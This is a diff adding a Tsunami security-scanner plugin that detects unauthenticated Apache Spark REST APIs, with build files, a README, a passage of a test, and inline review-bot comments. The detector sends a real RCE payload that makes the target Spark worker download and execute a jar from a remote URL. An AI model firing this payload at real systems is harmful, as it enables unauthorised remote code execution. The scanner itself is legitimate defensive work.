@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/papercut_ng_mf_cve_2023_27350/gradle/wrapper/gradle-wrapper.properties b/community/detectors/papercut_ng_mf_cve_2023_27350/gradle/wrapper/gradle-wrapper.properties index 8f9797cb5..d04736436 100644 --- a/community/detectors/papercut_ng_mf_cve_2023_27350/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/papercut_ng_mf_cve_2023_27350/gradle/wrapper/gradle-wrapper.properties @@ -1,6 +1,6 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME diff --git a/community/detectors/rce/apache_spark_exposed_api/README.md b/community/detectors/rce/apache_spark_exposed_api/README.md new file mode 100644 index 000000000..336167ff1 --- /dev/null +++ b/community/detectors/rce/apache_spark_exposed_api/README.md 
@@ -0,0 +1,23 @@
+# Apache Sparks exposed API
+
+This detector checks for exposed Apache Spark API servers.
+
+This API server, which does not have authentication enabled, is exposed if an
+Apache Sparks instance has the environment variable `spark.master.rest.enabled:
+true` set upon startup.
+
+An attacker can exploit this API to gain remote code execution by submitting a
+malicious Apache Sparks task, which dynamically loads attacker-controlled code.
+
+Exploit of this issue requires a POST request to the following URI:
+`http://:6066/v1/submissions/create`
+
+## Build jar file for this plugin
+
+Using `gradlew`:
+
+```shell
+./gradlew jar
+```
+
+Tsunami identifiable jar file is located at `build/libs` directory.
diff --git a/community/detectors/rce/apache_spark_exposed_api/build.gradle b/community/detectors/rce/apache_spark_exposed_api/build.gradle
new file mode 100644
index 000000000..e50d7b819
--- /dev/null
+++ b/community/detectors/rce/apache_spark_exposed_api/build.gradle
@@ -0,0 +1,70 @@ +plugins { + id 'java' +} + +description = 'Tsunami VulnDetector plugin to detect an exposed Apache Spark API service.' +group 'com.google.tsunami' +version '1.0-SNAPSHOT' + +repositories { + maven { // The google mirror is less flaky than mavenCentral() + url 'https://maven-central.storage-download.googleapis.com/repos/central/data/' + } + mavenCentral() + mavenLocal() +} + +java { + sourceCompatibility = JavaVersion.VERSION_11 + targetCompatibility = JavaVersion.VERSION_11 + + jar.manifest { + attributes('Implementation-Title': name, + 'Implementation-Version': version, + 'Built-By': System.getProperty('user.name'), + 'Built-JDK': System.getProperty('java.version'), + 'Source-Compatibility': sourceCompatibility, + 'Target-Compatibility': targetCompatibility) + } + + javadoc.options { + encoding = 'UTF-8' + use = true + links 'https://docs.oracle.com/javase/8/docs/api/' + } + + // Log stacktrace to console when test fails. + test { + testLogging { + exceptionFormat = 'full' + showExceptions true + showCauses true + showStackTraces true + } + maxHeapSize = '1500m' + } +} + +ext { + okhttpVersion = '3.12.0' + autoValueVersion = '1.7' + tsunamiVersion = 'latest.release' + junitVersion = '4.13' + mockitoVersion = '2.28.2' + truthVersion = '1.0.1' +} + +dependencies { + implementation "com.google.auto.value:auto-value-annotations:${autoValueVersion}" + implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}" + annotationProcessor "com.google.auto.value:auto-value:${autoValueVersion}" + + testImplementation "junit:junit:${junitVersion}" + testImplementation "org.mockito:mockito-core:${mockitoVersion}" + testImplementation "com.google.truth:truth:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}" + testImplementation 
"com.google.truth.extensions:truth-proto-extension:${truthVersion}" + testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}" +} diff --git a/community/detectors/rce/apache_spark_exposed_api/gradle/wrapper/gradle-wrapper.jar b/community/detectors/rce/apache_spark_exposed_api/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 000000000..e6441136f Binary files /dev/null and b/community/detectors/rce/apache_spark_exposed_api/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/rce/apache_spark_exposed_api/gradle/wrapper/gradle-wrapper.properties b/community/detectors/rce/apache_spark_exposed_api/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..d04736436 --- /dev/null +++ b/community/detectors/rce/apache_spark_exposed_api/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,7 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/community/detectors/rce/apache_spark_exposed_api/gradlew b/community/detectors/rce/apache_spark_exposed_api/gradlew new file mode 100755 index 000000000..1aa94a426 --- /dev/null +++ b/community/detectors/rce/apache_spark_exposed_api/gradlew 
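Review bot: `tsunamiVersion = 'latest.release'` in the `ext` block is a dynamic version, so the three `com.google.tsunami` artifacts resolve to whatever is newest at build time and the plugin jar cannot be rebuilt or audited against a known dependency set. Pin it to a fixed release, e.g. `tsunamiVersion = '<pinned-version>'`. The `repositories` block also lists `mavenLocal()`, which lets an artifact installed in the builder's local repository satisfy those coordinates; consider dropping it for release builds. `okhttpVersion = '3.12.0'` is an old release line and may deserve a bump even though it is only used for the test-scoped `mockwebserver`.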
@@ -0,0 +1,249 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. 
+# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. 
+if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. 
+ +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. 
+# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/community/detectors/rce/apache_spark_exposed_api/gradlew.bat b/community/detectors/rce/apache_spark_exposed_api/gradlew.bat new file mode 100644 index 000000000..25da30dbd --- /dev/null +++ b/community/detectors/rce/apache_spark_exposed_api/gradlew.bat 
@@ -0,0 +1,92 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. 
1>&2 +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/rce/apache_spark_exposed_api/settings.gradle b/community/detectors/rce/apache_spark_exposed_api/settings.gradle new file mode 100644 index 000000000..0edb48645 --- /dev/null +++ b/community/detectors/rce/apache_spark_exposed_api/settings.gradle @@ -0,0 +1,2 @@ +rootProject.name = 'apache_sparks_exposed_api' + diff --git a/community/detectors/rce/apache_spark_exposed_api/src/main/java/com/google/tsunami/plugins/detectors/rce/apachesparksexposedapi/ApacheSparksExposedApiVulnDetector.java b/community/detectors/rce/apache_spark_exposed_api/src/main/java/com/google/tsunami/plugins/detectors/rce/apachesparksexposedapi/ApacheSparksExposedApiVulnDetector.java new file mode 100644 index 000000000..d3ae700f0 --- /dev/null +++ b/community/detectors/rce/apache_spark_exposed_api/src/main/java/com/google/tsunami/plugins/detectors/rce/apachesparksexposedapi/ApacheSparksExposedApiVulnDetector.java 
@@ -0,0 +1,165 @@ +package com.google.tsunami.plugins.detectors.rce.apachesparksexposedapi; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.common.collect.ImmutableList.toImmutableList; +import static com.google.tsunami.common.net.http.HttpRequest.post; + +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.common.util.concurrent.Uninterruptibles; +import com.google.protobuf.ByteString; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.common.net.http.HttpStatus; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.plugin.payload.Payload; +import com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.PayloadGeneratorConfig; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Clock; +import java.time.Duration; +import java.time.Instant; +import java.util.regex.Pattern; +import javax.inject.Inject; + +/** A Tsunami plugin for detecting Exposed Apache Spark API. 
*/ +@PluginInfo( + type = PluginType.VULN_DETECTION, + name = "ApacheSparksExposedApiVulnDetector", + version = "0.1", + description = + "This plugin detects an exposed Apache Spark API which can lead to remote code execution" + + " (RCE)", + author = "Timo Mueller (work@mtimo.de)", + bootstrapModule = ApacheSparksExposedApiVulnDetectorBootstrapModule.class) +public final class ApacheSparksExposedApiVulnDetector implements VulnDetector { + + private final Clock utcClock; + private final HttpClient httpClient; + private final PayloadGenerator payloadGenerator; + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + public static final String VULNERABLE_PATH = "v1/submissions/create"; + private static final Pattern VULNERABILITY_RESPONSE_PATTERN = + Pattern.compile("Driver successfully submitted"); + private static String httpPayloadBodyFormatString = + "{\"action\":\"CreateSubmissionRequest\",\"clientSparkVersion\":\"1\",\"appArgs\":[\"%s\"]," + + "\"appResource\":\"%s\",\"environmentVariables\":{\"SPARK_ENV_LOADED\":\"1\"},\"mainClass\":\"Tsunami\"," + + "\"sparkProperties\":{\"spark.jars\":\"%s\",\"spark.driver.supervise\":\"false\",\"spark.app.name\":\"Tsunami\"" + + ",\"spark.eventLog.enabled\":\"true\",\"spark.submit.deployMode\":\"cluster\",\"spark.master\":\"spark://localhost:6066\"}}"; + private static final String JAR_PAYLOAD_URI = + "https://github.com/google/tsunami-security-scanner-plugins/raw/master/payloads/apache_spark_exposed_api/Tsunami_Apache_Spark_Exploit.jar"; + private static String interactionUriFormatString = "%s"; + + @Inject + ApacheSparksExposedApiVulnDetector( + @UtcClock Clock utcClock, HttpClient httpClient, PayloadGenerator payloadGenerator) { + this.utcClock = checkNotNull(utcClock); + this.httpClient = checkNotNull(httpClient); + this.payloadGenerator = checkNotNull(payloadGenerator); + } + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + 
logger.atInfo().log("ApacheSparksExposedApiVulnDetector starts detecting."); + + return DetectionReportList.newBuilder() + .addAllDetectionReports( + matchedServices.stream() + .filter(NetworkServiceUtils::isWebService) + .filter(this::isServiceVulnerable) + .map(networkService -> buildDetectionReport(targetInfo, networkService)) + .collect(toImmutableList())) + .build(); + } + + private boolean isServiceVulnerable(NetworkService networkService) { + return exploitUri(networkService); + } + + private boolean exploitUri(NetworkService networkService) { + String targetUri = + NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + VULNERABLE_PATH; + + PayloadGeneratorConfig config = + PayloadGeneratorConfig.newBuilder() + .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.SSRF) + .setInterpretationEnvironment( + PayloadGeneratorConfig.InterpretationEnvironment.INTERPRETATION_ANY) + .setExecutionEnvironment(PayloadGeneratorConfig.ExecutionEnvironment.EXEC_ANY) + .build(); + Payload payload = payloadGenerator.generate(config); + + String interaction_uri = String.format(interactionUriFormatString, payload.getPayload()); + + String finished_payload = + String.format( + httpPayloadBodyFormatString, interaction_uri, JAR_PAYLOAD_URI, JAR_PAYLOAD_URI); + + try { + + HttpResponse response = + httpClient.send( + post(targetUri) + .setHeaders( + HttpHeaders.builder() + .addHeader("Content-Type", "application/json") + .addHeader("User-Agent", "TSUNAMI_SCANNER") + .build()) + .setRequestBody(ByteString.copyFrom(finished_payload, "utf-8")) + .build(), + networkService); + if (response.status() == HttpStatus.OK && response.bodyString().isPresent()) { + String responseBody = response.bodyString().get(); + if (VULNERABILITY_RESPONSE_PATTERN.matcher(responseBody).find()) { + Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(10)); + return payload.checkIfExecuted(); + } + } + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query 
'%s'.", targetUri); + } + return false; + } + + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, NetworkService vulnerableNetworkService) { + + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("Apache_Spark_Exposed_Api")) + .setSeverity(Severity.CRITICAL) + .setTitle("Exposed Apache Spark API which allows unauthenticated RCE detected.") + .setDescription( + "An exposed Apache Spark API allows an unauthenticated attacker to submit a" + + " malicious task. If an Apache Spark worker processes such a task, it" + + " loads and executes attacker-controlled content from an external" + + " resource. This allows an attacker to execute arbitrary Java Code within" + + " the context of the worker node.") + .setRecommendation( + "Don't expose the Apache Spark API to unauthenticated attackers.")) + .build(); + } +} diff --git a/community/detectors/rce/apache_spark_exposed_api/src/main/java/com/google/tsunami/plugins/detectors/rce/apachesparksexposedapi/ApacheSparksExposedApiVulnDetectorBootstrapModule.java b/community/detectors/rce/apache_spark_exposed_api/src/main/java/com/google/tsunami/plugins/detectors/rce/apachesparksexposedapi/ApacheSparksExposedApiVulnDetectorBootstrapModule.java new file mode 100644 index 000000000..e69092925 --- /dev/null +++ b/community/detectors/rce/apache_spark_exposed_api/src/main/java/com/google/tsunami/plugins/detectors/rce/apachesparksexposedapi/ApacheSparksExposedApiVulnDetectorBootstrapModule.java 
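Review bot: `JAR_PAYLOAD_URI` points at `.../raw/master/payloads/...`, a mutable branch reference, so the jar that `exploitUri` asks the scanned Spark instance to load is whatever that branch holds at scan time. Pinning the URL to a commit (`.../raw/<commit-sha>/payloads/apache_spark_exposed_api/Tsunami_Apache_Spark_Exploit.jar`) keeps the payload fixed and auditable for anyone running the detector. `httpPayloadBodyFormatString` and `interactionUriFormatString` are never reassigned in this file and should be declared `private static final String`, like `VULNERABLE_PATH` and `JAR_PAYLOAD_URI`. The file also starts directly at `package` with no licence header, unlike the bootstrap module added in the same commit. The locals `interaction_uri` and `finished_payload` would read better as `interactionUri` and `finishedPayload`.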
@@ -0,0 +1,27 @@
+/*
+ * Copyright 2024 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.rce.apachesparksexposedapi;
+
+import com.google.tsunami.plugin.PluginBootstrapModule;
+
+/** A {@link PluginBootstrapModule} for {@link ApacheSparksExposedApiVulnDetector}. */
+public final class ApacheSparksExposedApiVulnDetectorBootstrapModule extends PluginBootstrapModule {
+
+ @Override
+ protected void configurePlugin() {
+ registerPlugin(ApacheSparksExposedApiVulnDetector.class);
+ }
+}
diff --git a/community/detectors/rce/apache_spark_exposed_api/src/test/java/com/google/tsunami/plugins/detectors/rce/apachesparksexposedapi/ApacheSparksExposedApiVulnDetectorTest.java b/community/detectors/rce/apache_spark_exposed_api/src/test/java/com/google/tsunami/plugins/detectors/rce/apachesparksexposedapi/ApacheSparksExposedApiVulnDetectorTest.java
new file mode 100644
index 000000000..df23f6f7d
--- /dev/null
+++ b/community/detectors/rce/apache_spark_exposed_api/src/test/java/com/google/tsunami/plugins/detectors/rce/apachesparksexposedapi/ApacheSparksExposedApiVulnDetectorTest.java
@@ -0,0 +1,175 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.apachesparksexposedapi; + +import static com.google.common.net.HttpHeaders.CONTENT_TYPE; +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostname; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +import com.google.common.collect.ImmutableList; +import com.google.common.net.MediaType; +import com.google.inject.Guice; +import com.google.protobuf.util.JsonFormat; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.callbackserver.proto.PollingResult; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.net.http.HttpStatus; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkEndpoint; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import 
com.google.tsunami.proto.TransportProtocol; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Instant; +import javax.inject.Inject; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +/** tests for {@link ApacheSparksExposedApiVulnDetector}. */ +@RunWith(JUnit4.class) +public final class ApacheSparksExposedApiVulnDetectorTest { + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z")); + + @Inject private ApacheSparksExposedApiVulnDetector detector; + private MockWebServer mockWebServer; + private MockWebServer mockCallbackServer; + + @Before + public void setUp() throws IOException { + mockWebServer = new MockWebServer(); + mockCallbackServer = new MockWebServer(); + mockCallbackServer.start(); + + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new HttpClientModule.Builder().build(), + FakePayloadGeneratorModule.builder().setCallbackServer(mockCallbackServer).build(), + new ApacheSparksExposedApiVulnDetectorBootstrapModule()) + .injectMembers(this); + } + + @After + public void tearDown() throws Exception { + mockCallbackServer.shutdown(); + mockWebServer.shutdown(); + } + + @Test + public void detect_ifVulnerable_reportsVuln() throws IOException { + // returning a 200 OK from vulnerable server is enough + mockWebServer.enqueue( + new MockResponse() + .setResponseCode(HttpStatus.OK.code()) + .setBody(" \"message\" : \"Driver successfully submitted as")); + mockWebServer.start(); + mockWebServer.url(ApacheSparksExposedApiVulnDetector.VULNERABLE_PATH); + // prepare a callbackserver response + PollingResult log = PollingResult.newBuilder().setHasHttpInteraction(true).build(); + String body = 
